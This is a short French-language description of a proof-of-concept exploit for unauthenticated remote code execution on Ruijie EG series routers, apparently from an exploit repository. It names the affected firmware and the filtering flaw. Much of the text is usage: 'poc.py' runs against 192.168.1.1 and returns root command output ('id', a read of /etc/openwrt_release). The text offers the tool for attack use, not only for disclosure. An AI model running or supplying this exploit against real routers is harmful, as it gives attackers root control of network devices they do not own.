
Exploit de preuve de concept pour l'exécution de code à distance non authentifiée sur les routeurs de la série Ruijie EG (firmware <=EG_3.0(1)B11P216). Exécute des commandes arbitraires via des requêtes HTTP malveillantes.
Les routeurs de la série Ruijie EG avec un firmware <=EG_3.0(1)B11P216 permettent à des attaquants non authentifiés d'exécuter du code arbitraire à distance en raison d'un filtrage incorrect.
$ python3 poc.py 192.168.1.1 'id'
uid=0(root) gid=0(root)
$ python3 poc.py 192.168.1.1 'grep TARGET /etc/openwrt_release'
DISTRIB_TARGET='mediatek/eg310gh-e'